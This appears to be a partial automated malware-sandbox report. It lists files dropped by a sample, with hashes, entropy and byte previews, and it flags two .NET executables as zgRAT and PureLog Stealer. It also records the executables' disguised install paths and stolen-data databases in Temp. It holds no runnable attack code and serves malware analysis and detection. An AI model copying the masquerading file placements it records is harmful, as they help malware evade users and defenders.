SHA-512:	DAA632663904264CB322E3552472D9E52D57347CE74C6673838D9EF2AE30BD5DEC84467168040096C580730EFDD8D63D5146474397F96C041C8F5ADE8472DE25
Malicious:	false
Preview:	UlZi6hesdt69YIOjfFuUCzdhKQboDsxw85S6dKUH8jKChUCGi18ffrnfI2YqG0ov5KBczSGUvnWcoa9zNVGLtSRRRwykwnBI5YGWTjQPvou2UL1r2icvtcCn3uKDefhHmOhPUngoE0aEhY6G5HrOKQYcWddiYNvPGnPGolWPByq3C7FexEHWyT6WzE30J8Q1EK74JzbTucNWjfZYY9vTFZbxq3RjsgGDhyy1AKU7mymWGjwUofcKM6vptKOQi2lNVJyurhYNoxrRwFrHG64MD50lDIIz6EYuMYA6uCmHHOgZPe3ocGJm7YKaTNriZiRjY6FXEvWEUxFyZbWiOeWz4wwxOkmhUDri76ASZfjruFSJTVA21IT4LbolJRJeIytQFg1daDJt5pFzeme2juqMtwXgSYIHWEi5WBEwehbx8k9gWzGgwQ5YIhgSJVLB4BX0GJdcirYCS2NJx1JcSlVFJJxyfvnJWa26NJZNWn8F22GPUWfSLstTqRr6Vo7wEOq19Q5nb6GonPNQDieIQV7nrjP6cc1rqLBnMOPDb10PmFpbDa3xJygsQCKaA9L9EY7bOjDySarYesBl3y2BiEi2oSWKEzDbq1LNIOMdXFetGINiAigLHKa90Ew6N2tdXQrnhxdpmYodjywgEyKfS1UgbLXDbQQeVBV0akBMF1jsf

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1978368
Entropy (8bit):	7.559518015543571
Encrypted:	false
SSDEEP:	24576:dTzktGDDycueG0kIz5uGigS9r0VxU5UNWL061SZDm9/CIBDwHfTvATErI:dEJculsz5u4SlYrWL06YZ+/DQvA4
MD5:	A961FFE1FAEECF8AD553D4792052498C
SHA1:	1A8DA2A519AC6D60A3AF0E7BEF9D210BF9F00625
SHA-256:	BF7C89BB02A84441CBF8A99D90D58203325AEB848CEA98A62DBE9A39BC61308F
SHA-512:	873BB592136978E3A6D514EB8DAE204E96F42C36BED28A274EF84666A0FC4D82A4F4DAD1119E3FA754C3E6E4EEAE8AC4040DD1BA3E3F6D5D9881CF2177F96C81
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................(...........G... ...`....@.. ....................................@.................................@G..K....`..p............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...p....`.....................@....reloc..............................@..B................pG......H.......L...<.......o........m...F.......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....8........0.......... ........8........E........P..._...............8....~....(G... .... .... ....s....~....(K....... ....~r...{....9....& ....8....8N... ....8....~....9.... ....~r...{....:f...& ....8[......... ....8K...r...ps....z*....~....(O...~....(S... ....?...

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8307242601039008
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugQ:gJjJGtpTq2yv1AuNZRY3diu8iBVqFG
MD5:	175E3A01297B9664333B4C5997C7EEBA
SHA1:	5CFF773879E44E6A66102A4CFD09DC971B303232
SHA-256:	9393A3C436019A77922A4E244AE8EE536E6B8A94D90C542F868AF55107224054
SHA-512:	09DE1B1B5784AD64B37B4872C5C7F582B488E7F1BB49BA701EE536A8BA2B2E8D9D5391734213C824381E290B854E916E0E8BDC870CA2AD908A5B1DD7652D3348
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe0725346, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6585743671028014
Encrypted:	false
SSDEEP:	1536:5SB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:5aza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	4E2F61101E41FEB622139FB7392D1ECF
SHA1:	4C775216A80F7008D4DA1E1AF7B330F9F797FC46
SHA-256:	C3A88360EE56117BB3EC09DAB1F83E3E583893FD503BCD74DCC7632E255EE8A1
SHA-512:	AD7B3008CA853FC72D7B181D65B9CE9A18E53455E6B039D62E746247D7C768A40E565353EC13D723507287FF93F26399321FEDAD0807D1449C810D629F69F57C
Malicious:	false
Preview:	.rSF... ...............X\...;...{......................0.z..........{..3-...\|..h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{.....................................3-...\|...................J.c3-...\|...........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08097047126892432
Encrypted:	false
SSDEEP:	3:5al6YeheUZHGuAJkhvekl1cBWhpUJXollrekGltll/SPj:Yl6zheMHrxlmRIJe3l
MD5:	AD44B31E9FBD66372A119291374DF21E
SHA1:	A072D9A987ABBA0CCC8F434154F770E458285E5E
SHA-256:	A0CBA912164CFD0182B872A6B65EA1742A5F118EC8B67F9A870FD4B1354AB46E
SHA-512:	AB8B65A7727E68BB1B1693468076C3E6DC3ABE71FD119C2C7238DCF112999AD86F797ECE158495A689874E7D7195F3C5CFBFBB95EDF999E393F4428E6414C956
Malicious:	false
Preview:	g........................................;...{..3-...\|.......{...............{.......{...XL......{...................J.c3-...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\75cd070fe4800c

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	ASCII text, with very long lines (570), with no line terminators
Category:	dropped
Size (bytes):	570
Entropy (8bit):	5.882969147345178
Encrypted:	false
SSDEEP:	12:ZOC3HCoZgT3hFQ1+OJbz8bjZ/TNLhCqJ8SkoBhWDU7WCcQTGw:4CSSOFQ1fJbzE3db8gBUDUqRw
MD5:	F6C4AFAF6A8D499729EFDD4DE3758F3B
SHA1:	AA5C8D36AD498AC8C2BCB76007F258FEAB76037C
SHA-256:	BEFBE8635B61D7B53B26BAB7635E7532D4AB13FC2C4A3B74B2EE832DEAB18F30
SHA-512:	6BBFC631336A7E8E905D52BDBD0498512E758A69937111E9BFA62CABBA589B886F9C7101E47DBE8B24B69B4EF368C844FC4EE3FBADCEBF9392C01B045AC380CC
Malicious:	false
Preview:	7tXO82RsJLOGELXhvGoApFOPBxFOfhUOgA1SRbiQ2laXPpaVO6ja5U32fHNLxDNl09jETEPUiYIDo1AVWtAj74TMG9xJNWdyYygPGWBJqP1gL0NoG1yDDno6qX8URFGL5TozUuPAs03sCwAPvJCViZvuJkjsYr2kIql1MXTWmyUMu633XsiIDumfi3puLglA8SjVKIDY0qtuEjANqpVqIuhXDGTSrjKFMUObWisOoKRWB2a83cDfL51OvMREyvqQgohuUi0I6GB8cKWKqVYPfo4QcApKQoZ3eBzXVpnUm4jE43wk0HXdWbv1uRSU2p2SrIeaV8zArEmkFzWjOFUJQ6gCQ8mEXTb6CQXvYVP1RWwSyKw44tGxVtBulbKXVvnYmqiyckK2zd14KOOGLsJoMolTPmK7K2fgtYpIl8bUiN821HkXNELnl9L8EOizaMs67VLviFeNQzF8psbIBxtFr14tMrDWZm4VfB4f6yyHk8Ww4NSWxaxmdnPFbbj1CHyo5tdny6MN9metfHz8Yrj8yR22wyEeO6EdJs1Kuoi1Okn0IgkTlldVhz0n0k

C:\Recovery\DtJTopEKFGnyRQt.exe

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1978368
Entropy (8bit):	7.559518015543571
Encrypted:	false
SSDEEP:	24576:dTzktGDDycueG0kIz5uGigS9r0VxU5UNWL061SZDm9/CIBDwHfTvATErI:dEJculsz5u4SlYrWL06YZ+/DQvA4
MD5:	A961FFE1FAEECF8AD553D4792052498C
SHA1:	1A8DA2A519AC6D60A3AF0E7BEF9D210BF9F00625
SHA-256:	BF7C89BB02A84441CBF8A99D90D58203325AEB848CEA98A62DBE9A39BC61308F
SHA-512:	873BB592136978E3A6D514EB8DAE204E96F42C36BED28A274EF84666A0FC4D82A4F4DAD1119E3FA754C3E6E4EEAE8AC4040DD1BA3E3F6D5D9881CF2177F96C81
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\DtJTopEKFGnyRQt.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\DtJTopEKFGnyRQt.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................(...........G... ...`....@.. ....................................@.................................@G..K....`..p............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...p....`.....................@....reloc..............................@..B................pG......H.......L...<.......o........m...F.......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....8........0.......... ........8........E........P..._...............8....~....(G... .... .... ....s....~....(K....... ....~r...{....9....& ....8....8N... ....8....~....9.... ....~r...{....:f...& ....8[......... ....8K...r...ps....z*....~....(O...~....(S... ....?...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DtJTopEKFGnyRQt.exe.log

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.354334472896228
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5:	9F9FA9EFE67E9BBD165432FA39813EEA
SHA1:	6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256:	4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512:	F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainportruntimeCrtMonitor.exe.log

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	19253
Entropy (8bit):	5.005753878328145
Encrypted:	false
SSDEEP:	384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
MD5:	81D32E8AE893770C4DEA5135D1D8E78D
SHA1:	CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
SHA-256:	6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
SHA-512:	FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1628158735648508
Encrypted:	false
SSDEEP:	3:Nlllulvh2th:NllUE
MD5:	1C6FEFD3AEFA5BA7595E7FC2E4284A86
SHA1:	1061961FD8D9427258B32E58594747A9009930B7
SHA-256:	AB4853F85060BF67D37B111333E3852386DF7BF6AA0499E6CEF96B10CE5A1621
SHA-512:	03A091C2C65B6C22EFB336B4155E8579A540C773DB34E8F8654BC3D7044C00434020096B41BF2959245CA8722CF3913B38A653DE361A5BF0FDF218A6F07B6626
Malicious:	false
Preview:	@...e.................................~..............@..........

C:\Users\user\AppData\Local\Temp\1gW1tPu1US

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\276fpvbaYO

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.0536606896881855
Encrypted:	false
SSDEEP:	3:/hQ5qSpTpn:e5qaln
MD5:	097F990F6D0E8D6D912DCF1DC2F33C07
SHA1:	4722C89072F4BADC5BDFF064A064AB9D6F6421B8
SHA-256:	B8811AED63CCB0AD24178020D2CDD6EB41C84C69083BA21C375A541F3330DD2F
SHA-512:	E4AE000413FD290921EF811D6D3B5DB2E61C314D48018646CE3D9EC055C1D66117EB5D60B82FBC4AE9ADB06CE06B5E5CE0FCD36914A41569D9CC4C644B366CC6
Malicious:	false
Preview:	bNnRjL5VVhOih8JbFXi7LyRaL

C:\Users\user\AppData\Local\Temp\3alM8WGWtE

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6Nlwo6XyRo

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.483856189774723
Encrypted:	false
SSDEEP:	3:g1m+rk3:gw/3
MD5:	7C9C18C540E9A5C0DC2904A577B0A184
SHA1:	2F0C1E7751B981AE7BABCC07BE10B6D78861E9D5
SHA-256:	6C5FC7BAA97C99244CEDD3F9CCE6BA0CE3028D73C2A3CB436BB27B2CED2BDCB7
SHA-512:	3BCDF030604F18C6C20D06E99D116816273BBAB291F31B6A454286A56A68A500FA3410BAED736414DBEECAB52EB8572E9806C1A7A493D9145BF078134D76F663
Malicious:	false
Preview:	XPEpPcTrCizZbjWuSNtgzqJDM

C:\Users\user\AppData\Local\Temp\7UN75ztwVG

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ob2XGn5b6

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\9AHwOAovog

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AhOGLwsdhf

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Kb7lU6gCn4

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Ta8WOqE1bD

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0daclywd.3rt.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4j0xg2wo.5nz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
